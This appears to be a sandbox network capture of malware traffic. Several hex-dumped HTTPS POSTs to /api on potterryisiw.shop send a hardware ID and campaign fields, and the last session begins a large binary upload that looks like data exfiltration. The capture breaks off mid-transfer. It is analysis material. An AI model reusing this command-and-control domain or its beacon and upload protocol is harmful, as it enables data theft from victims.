2024-07-01 07:16:38 UTC	800	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mkknra6l6ga145kjj1sgu6mlto; expires=Fri, 25-Oct-2024 01:03:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ctTpIfJqlsqtNaVVMAnbYrNIaz2I2tl5CgZS1MlIxynqPgXNzN81tTAdESM7c7FQxvoxltzwXHpRwnhL0uuUjrKN7KdiXjDhsJO8zDj9%2FmiLCH7lTaZskFDgTHEBP16Q72b6pg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c9c4aca424d-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:38 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	49821	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:39 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7088 Host: potterryisiw.shop
2024-07-01 07:16:39 UTC	7088	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:39 UTC	800	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i14fjkmtfav74pjgtiqfeu1oo6; expires=Fri, 25-Oct-2024 01:03:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDwL0Sf7Tvhy4zNCVhq21ex20vInVM0JYghVMLtMPI0J6CZHdSDZLS9ZoF7xi1ngzmQSK4GodNC1M7TNJVzw72nAd3APfsstKNIey1P1WNjaA6BuLhljI9ep7IGps20jUop0Xw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49ca1998417ad-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:39 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	49822	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:39 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7088 Host: potterryisiw.shop
2024-07-01 07:16:39 UTC	7088	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:40 UTC	808	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qmsbpsrp2836lddstu1dn9cuq2; expires=Fri, 25-Oct-2024 01:03:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BhYI%2FuSR7o9pu7wK7m3Vrve35n05YzKgZvu5NWFYapEL92GFasdivnUgVAHkbXwUIfsrCbvIkPnu4gSuvqwTtOs%2BChcSVjWd3KV%2FCDvC69sipDoNzDRf2U8AJ%2FDsDBdCPtCh6g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49ca45f16c463-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:40 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	49824	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:40 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1294 Host: potterryisiw.shop
2024-07-01 07:16:40 UTC	1294	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:40 UTC	812	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tqhvo2pn6shtobns9iehkvv215; expires=Fri, 25-Oct-2024 01:03:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZHr83bAQWh%2F9zypz4bJVd3x7hhzMEl%2BT7I6SmDxME1cChevDU1bPUA%2BtNDMMxVUT06fkAjo3Y%2FT3oBiwUEhGUqV6J5DS9yqJKEHqTtyZV6sUA%2F%2BjbNUMu%2BrEa2PsSq8ksNmD6g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49ca76f4e0f97-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:40 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	49826	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:40 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1294 Host: potterryisiw.shop
2024-07-01 07:16:40 UTC	1294	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:41 UTC	810	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=06p4kibgs1daanfif7elgg9fc1; expires=Fri, 25-Oct-2024 01:03:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZvXmgn7mZirH%2BjoiRN%2FpeWkaELdGzHgOdj8RoUeHk3o1%2BXU21uomavWfFr27x00Am%2FWO57nzGIhLdlQPKNvpcYOPlaonltNIO%2Bxp3mIAS8VgqLM7UQzQS%2B1xoTo9W2LDtxAkcw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49cabaed06a56-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:41 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-01 07:16:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	49828	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:41 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 580138 Host: potterryisiw.shop
2024-07-01 07:16:41 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:41 UTC	15331	OUT	Data Raw: 0d 79 01 16 88 04 b0 1b b7 69 2a 8d 76 68 07 ac 98 b3 d9 57 69 17 81 8d 56 d4 ca 7e e8 31 ea 9d 76 66 e7 13 97 58 15 a4 d7 55 bf fd 7f 1b 8c 90 cb 35 40 ff d0 0a 66 70 20 c6 84 9a cb 46 0a 4e 10 88 30 0d 6b 8d d1 58 8f 78 56 1e c5 53 04 b5 b9 9b 12 78 30 12 de e2 a1 d8 b7 59 42 cc 83 92 dd 02 c0 26 31 dd de 0d 07 1a e5 16 ae 98 a0 a3 44 9e db 97 40 b2 ca 30 55 64 bb 48 83 e6 bd f1 29 25 24 f6 8b 31 4b a8 43 92 ee b0 09 45 0e 0e c4 bf fc 3d ae cc 9d d0 8c a3 56 9a c9 a8 f7 c3 d2 5d 45 c0 d2 85 3b 59 54 8c 29 3c 8f 99 a3 a4 6e 35 fa 3a cb b1 eb 1c 08 9b c4 15 b9 ea 8d 3a 93 11 1f 5b 69 2a 99 99 81 85 c5 97 35 a6 de 2e 01 ef 3d 34 2d b4 3f 1f 98 fc 89 5e d8 20 04 18 3d 30 0f 2c 92 b3 86 c8 23 75 35 5f 13 bf 72 47 8c 5d df f5 93 78 e7 df 27 68 f0 c4 a2 b6 3e Data Ascii: yivhWiV~1vfXU5@fp FN0kXxVSx0YB&1D@0UdH)%$1KCE=V]E;YT)<n5::[i5.=4-?^ =0,#u5_rG]x'h>
2024-07-01 07:16:41 UTC	15331	OUT	Data Raw: 10 d5 f8 0f 41 7f db 7a a1 e6 12 ac a1 21 7d 32 52 7e a4 3a 06 2c a5 d0 88 c3 d2 43 e9 66 77 65 8e c2 6b c6 a1 66 b1 44 4f 1c 19 b3 a0 73 bd f1 93 de 4c 98 52 9b 19 ec df 62 14 b5 f2 1d 1b e5 e9 bd e1 31 40 b2 67 fc 14 3d 69 ed 2a 13 e4 bd 87 3c 37 f4 34 82 fc 53 c0 ce 93 5f 35 5b 69 23 c3 d3 62 7c 7b c8 f8 a5 a5 45 88 a3 00 fe 00 e7 b9 e4 f6 a9 57 cd 5f e4 18 b0 bf d7 7c 4f 4f d0 d4 cc b9 c8 8c b9 8f 9a 48 bc 3f 29 dd f1 3b 1e 45 6c 7e 56 fd 73 bd 49 8a a1 cc 69 bb 43 34 0b fc b1 d6 78 96 80 aa fd cb b6 f9 ab 62 7d e0 5e f6 70 aa d3 2a 69 a4 01 35 76 19 58 44 53 f1 33 f8 65 c9 5f 45 c4 33 4e f6 33 f2 43 0a 69 56 d4 6c 38 7e 30 9a f5 c0 83 a6 82 aa 31 8a f0 be ea b9 85 1f bb 9c df aa 0d 7a a5 42 a5 17 2f 64 bb 2a 56 5f 9d 3b cc 34 ae ad e6 95 e9 b8 86 32 Data Ascii: Az!}2R~:,CfwekfDOsLRb1@g=i<74S_5[i#b\|{EW_\|OOH?);El~VsIiC4xb}^pi5vXDS3e_E3N3CiVl8~01zB/d*V_;42
2024-07-01 07:16:41 UTC	15331	OUT	Data Raw: 5f 5d dc 60 1a 2d 08 80 bb 01 25 07 3f f4 2b 70 70 50 fb 61 38 85 d6 d7 1a 91 ee f3 d0 b1 37 2b b3 73 b7 ac 87 a5 85 5b cf 78 33 1d 38 8f 04 bf ab c6 8c 3a 8f fc a3 54 c9 5e 9f ba 34 87 f5 19 a4 dd 6c 1d 32 7b 70 98 7b 77 af 40 9e 2e 02 fb c8 88 c4 75 be cc 50 fb 20 77 94 03 63 a7 41 b6 ee 90 ff 35 61 b0 70 56 10 2c 87 b1 77 02 87 3e 71 3b 63 88 a0 9f c3 aa d9 e7 eb f7 06 9c c5 4c d7 0f 08 39 46 58 6e 84 ec 7a 08 26 76 1c 1b c2 b1 2e 66 fc 6b f7 95 ca 61 d2 57 59 9f 49 1d bd 76 d9 f1 8f 84 d9 c1 d0 d7 44 f2 a4 bf 74 6c 45 f4 01 54 f1 ac 7f ac 9b bc c1 8f 3d 6f 4d f0 85 61 d6 ca 20 99 ac ad 7c f3 9f 8c 37 d2 12 af 72 1f 8d 36 b3 9e c5 b5 df d1 fb 84 ca 3b 21 5f 24 d1 9e f4 45 5d 55 51 6f fe 2e 00 62 70 73 18 71 93 2a 9f e8 1d 7a dc 93 5b 40 13 b0 97 0b 7c Data Ascii: _]`-%?+ppPa87+s[x38:T^4l2{p{w@.uP wcA5apV,w>q;cL9FXnz&v.fkaWYIvDtlET=oMa \|7r6;!_$E]UQo.bpsq*z[@\|
2024-07-01 07:16:41 UTC	15331	OUT	Data Raw: d4 f4 c1 b3 d9 1e 19 e1 1c 8e 2f 0e 2e 78 e6 2f 5f d2 df 11 45 7e ec 8a 2a 34 ce 60 e4 5d c1 dd 49 dc 9d d9 13 bd d4 06 80 80 2c 14 86 8a c8 85 01 de 8c 18 bd 1f 8d 20 32 19 4e 10 73 c3 c9 46 fc 78 5f ff 6b bf 2c 44 be 21 d8 b3 f5 bf 22 e4 ff 75 53 c6 71 8e f2 34 07 40 f9 26 0f 3b cf 9d cd 69 a7 a0 58 e4 cf 0f 1e ce 94 dd cc f3 21 52 6a 1f b6 66 5e e3 05 87 d5 f9 60 04 c8 b8 be a6 43 fa af fd 90 10 8b c7 72 1d dd 6e f5 9b 93 da da 7c fc ed 41 9d 55 c9 99 a0 3c a1 51 2c 38 0b d9 73 01 b3 55 84 96 cb 0d 19 48 99 5e 44 da 87 f3 47 08 4f 5d f3 53 03 ce e8 95 6b 13 bd 95 c8 2d f9 39 14 e8 d2 8b 18 1a 1f 20 b7 5f cc 6c 8c 10 1a 3b 7d 25 0d 92 12 3c 02 e7 58 18 7d 46 d2 15 05 12 fb c3 8f 5e 38 01 aa b9 46 2f f2 dd 83 ee 7a 4a 3c 39 1c 86 0c 13 c5 b9 fe 59 fb 6a Data Ascii: /.x/_E~*4`]I, 2NsFx_k,D!"uSq4@&;iX!Rjf^`Crn\|AU<Q,8sUH^DGO]Sk-9 _l;}%<X}F^8F/zJ<9Yj
2024-07-01 07:16:41 UTC	15331	OUT	Data Raw: 67 8d 6c 0d 69 cf a9 94 0b 82 75 c2 40 b3 5b 88 14 bf 29 f6 13 d6 e9 f2 c2 65 d6 23 fb e2 ee 35 d9 36 2b e3 fd fb f1 b9 6f 60 49 e7 e4 3d 60 64 0c e0 65 79 a6 bb 35 20 b8 32 b1 fb b7 d3 58 4d a6 44 61 ee 31 58 9c ff 52 ea 7e fc 31 d8 5f a9 14 17 8c 2c 45 6a b3 f4 c3 2a 67 4e 4f 93 2d b1 f3 47 eb 15 b1 4d 8c ec cc d2 78 c0 e3 e4 c4 39 cc 32 42 68 1e c6 5c 7f 76 98 5d a4 e2 a9 e9 cb 39 c1 fe 1e 48 d1 fc 08 da 1a 83 bb 96 9b aa 67 78 f6 2d 99 bf 35 4f 42 e2 11 54 ed 3d 38 5c 92 8a a9 42 7a 98 7e 0b aa 44 a0 61 48 29 60 66 f4 87 2b d7 f1 8c 43 76 48 c6 68 51 92 8e 72 f0 22 a7 88 89 3d 3e 8c e9 8a a1 e2 f7 f6 db 72 c6 a1 5a 85 ca a7 a4 71 3d 18 b4 5b a7 05 e3 b7 3a 69 56 f8 8a 45 fa 93 a8 08 90 f1 f7 b9 bf 44 58 a5 18 10 78 51 1c 0f e1 a9 24 bb 20 65 c7 4f 55 Data Ascii: gliu@[)e#56+o`I=`dey5 2XMDa1XR~1_,Ej*gNO-GMx92Bh\v]9Hgx-5OBT=8\Bz~DaH)`f+CvHhQr"=>rZq=[:iVEDXxQ$ eOU
2024-07-01 07:16:41 UTC	15331	OUT	Data Raw: 4b d4 47 be 6c da 1d 54 d9 c1 e3 10 8f 6a 10 cd 61 b8 fd 5b 14 1e b9 58 ae 03 e7 7b 2f 5f 84 cd 10 40 4a a7 2e 37 25 2b 67 7d d2 66 b4 c2 88 b3 13 1d 62 a4 1a 93 2f 21 e5 d8 00 89 4a f9 23 50 fb 49 21 06 db 5f 2f 19 0a 15 dc 7a 1d 4f b3 d5 01 10 27 e1 33 67 b9 2f 37 74 fd bb 7d 82 34 b0 ac 9e 7e cc 0f e6 f4 61 03 4a 20 f8 10 92 02 31 86 a3 44 40 63 11 65 af 6e ef 07 17 72 c9 d2 fb 77 ed 5f 57 ed 1e d8 0d 0f 0d c0 58 03 de ad 67 3c 6a 36 27 00 90 cb 06 4b 51 f2 8f 8d de dd b8 c5 09 74 b9 4a b1 1a 4e 25 81 a2 b4 e1 99 a6 bc 8f 3a 26 24 34 cf 0d 01 af 61 1d 0b 0f 97 d9 8f 5c ec 82 41 af 71 11 d2 62 46 60 74 ea dd d5 f6 bd 71 ea 23 59 72 88 bb 3e 96 d4 8c a0 d6 1f 22 3c 2d bd b2 2f 78 03 56 d5 b3 21 70 2c 8a f2 bf 4e c8 73 72 22 ff bb 8c f4 44 07 0a 92 85 e4 Data Ascii: KGlTja[X{/_@J.7%+g}fb/!J#PI!_/zO'3g/7t}4~aJ 1D@cenrw_WXg<j6'KQtJN%:&$4a\AqbF`tq#Yr>"<-/xV!p,Nsr"D
2024-07-01 07:16:41 UTC	15331	OUT	Data Raw: e7 26 61 39 15 01 b7 0a 6f fc 79 6e b1 3b fc fc 69 60 0e 6a 8b 1e 7e f5 b1 19 55 a5 29 26 1c 50 ef d3 05 46 bf 76 07 ad 04 2c e2 56 75 be 0e 0a 84 84 87 2f 0c 0e f9 20 d8 50 8f 52 69 f1 b2 db 9c 4c 45 19 af c6 27 63 b2 a8 61 ac 9b 92 fa 73 b3 6a 7e 3a 86 c3 74 33 5e bc 38 c5 9c 6e b9 8b 00 c6 26 e9 41 3f 16 af 6f bd 32 e2 45 23 f5 c3 d9 fd 25 5f 33 fb f5 63 b1 07 a8 2a ec b1 c3 e9 a7 3f 32 3d de 87 74 b4 41 b7 37 93 7f 0a 59 b2 66 92 f9 4b de 9b b8 a7 5a 9f 50 a3 df bf fc 68 f8 09 68 a9 3c bc f1 8f dd e3 f4 fc 73 42 ac e1 3d d0 76 76 6f d5 34 9f a2 ec c6 9c e1 86 8c ed 8a 9d 46 81 f9 a2 ee cb ce 8b 4e ab ba 31 dc cd 9c a1 a2 04 d6 96 8e 10 d9 95 74 b8 ea 61 35 e7 0c f4 ca 7f 7d 63 28 e4 0a 38 58 56 dd e6 cd 9e 7e 78 20 b7 a6 73 4d 87 93 57 69 a3 39 32 38 Data Ascii: &a9oyn;i`j~U)&PFv,Vu/ PRiLE'casj~:t3^8n&A?o2E#%_3c*?2=tA7YfKZPhh<sB=vvo4FN1ta5}c(8XV~x sMWi928
2024-07-01 07:16:41 UTC	15331	OUT	Data Raw: 3d 57 fa 6d c7 ca a6 3c 16 1f ef 14 06 51 9b 25 9f c2 ed de cd 25 32 12 c7 c4 e7 f4 45 42 d7 38 ce d2 60 dd 4d 1d 10 55 08 cc 89 f5 ac bd b6 6e 02 12 02 08 d9 d3 67 d9 26 7e 50 e9 5d ac cf d3 74 e9 db 0e 96 19 4e d9 46 c2 c2 b0 cd 70 55 54 c8 d9 6f d5 97 1f 28 85 7b 6e 96 24 90 d1 d1 06 3c 31 71 17 93 37 cd 8c 51 61 c6 46 88 1c f6 52 75 0a a6 51 af c0 22 34 e8 a9 fa 66 a3 f6 61 66 93 e0 88 09 c9 5c bb 69 b9 4d 4d 5b 95 91 ca cb 9e a7 12 30 0f b1 05 d2 a1 ee 9f 92 0b 12 75 c0 8c c1 08 a7 82 69 8c 9c 3b 40 36 56 d4 9f 12 b3 44 47 96 61 c4 85 5f 2a c2 b8 cd 76 48 4f ad c0 16 52 e9 0b 4b 5d 93 c9 74 d6 7b af c9 d8 83 6d 1c a5 c4 2f 1f 58 bf 3b 24 26 84 f6 fb 7d a8 03 10 d3 c2 2f 46 7e 4d d4 4e 42 13 e5 91 1d 1d 14 29 17 e2 4f 7a e1 52 dd 41 64 c0 63 c8 aa 31 Data Ascii: =Wm<Q%%2EB8`MUng&~P]tNFpUTo({n$<1q7QaFRuQ"4faf\iMM[0ui;@6VDGa_*vHORK]t{m/X;$&}/F~MNB)OzRAdc1
2024-07-01 07:16:41 UTC	15331	OUT	Data Raw: 49 cb 5a 1c 9c 3f 5f 30 18 ec be e4 1b 51 53 3b 3d 7a 72 5c 9f f9 52 f6 89 c2 68 80 df 68 88 8a 70 df 89 a0 fa c8 a7 dc 65 52 88 3e 33 c2 12 19 92 d8 cd e8 1b 5e db 49 63 fa 66 70 22 0e b8 be 6d ac 3d 5f f0 8e a1 1f 52 76 8a 3d b8 e8 7e ab c4 5c f6 b8 c9 97 86 f7 77 b3 6e cd 18 16 04 e0 f3 3a a7 cd 31 0b 9f ec c8 e7 6d 72 13 6a 9e 0a 0e 6d 34 48 0d f7 19 36 b8 e1 17 e6 f1 ac 7b 24 19 3f fb 0a 4b 8b 60 37 7f 58 cb 64 e5 8f 9c da 09 e2 47 3f 43 54 22 43 a3 68 87 50 03 1f b8 09 fd 05 7f 0e fe e7 3e 8b 8d 57 0e 9a f0 78 c7 ca df 26 a7 61 24 64 26 8d 32 0d a0 53 df cf 99 4c b0 b8 86 73 37 92 d9 8b 